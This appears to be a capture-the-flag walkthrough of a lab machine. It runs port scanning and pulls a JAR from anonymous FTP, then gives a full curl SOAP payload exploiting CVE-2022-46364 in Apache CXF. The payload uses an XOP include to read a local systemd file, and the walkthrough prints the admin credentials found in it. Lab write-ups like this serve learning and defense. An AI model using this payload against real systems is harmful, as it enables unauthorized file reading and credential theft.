Objective: Identify open ports and services on the target machine.
Command Executed:
nmap -p- --min-rate=1000 -T4 10.129.17.177
Output / Findings:
Action Taken: Added 10.129.17.177 devarea.htb to the local /etc/hosts file for easier access.
Objective: Investigate the anonymous FTP server to see if any sensitive files are exposed.
Command Executed:
wget -q <ftp://anonymous:[email protected]/pub/employee-service.jar>
Findings: Successfully downloaded employee-service.jar. Analyzing the decompiled JAR (using jd-gui) revealed the application uses Apache CXF version 3.2.14, and exposed a SOAP web service endpoint at http://devarea.htb:8080/employeeservice?wsdl.
Objective: Exploit the vulnerable Apache CXF version (CVE-2022-46364) via an XML External Entity (XXE) / SSRF vulnerability using an XOP include to read local files.
Command Executed:
curl -s -X POST "<http://10.129.17.177:8080/employeeservice>" \\\\
-H 'Content-Type: multipart/related; type="application/xop+xml"; start="<[email protected]>"; start-info="text/xml"; boundary="----=bound"' \\\\
-d '------=bound
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <[email protected]>
<soapenv:Envelope xmlns:soapenv="<http://schemas.xmlsoap.org/soap/envelope/>" xmlns:dev="<http://devarea.htb/>">
<soapenv:Header/>
<soapenv:Body>
<dev:submitReport>
<arg0>
<employeeName><xop:Include xmlns:xop="<http://www.w3.org/2004/08/xop/include>" href="file:///etc/systemd/system/hoverfly.service"/></employeeName>
<department>IT</department>
<content>test</content>
<confidential>false</confidential>
</arg0>
</dev:submitReport>
</soapenv:Body>
</soapenv:Envelope>
------=bound--'
Findings: The server responded with the base64-encoded content of /etc/systemd/system/hoverfly.service.
Command Executed:
echo "<base64_string>" | base64 -d
Extracted Credentials: The decoded service file revealed the Hoverfly admin credentials: admin:O7IJ27MyyXiU.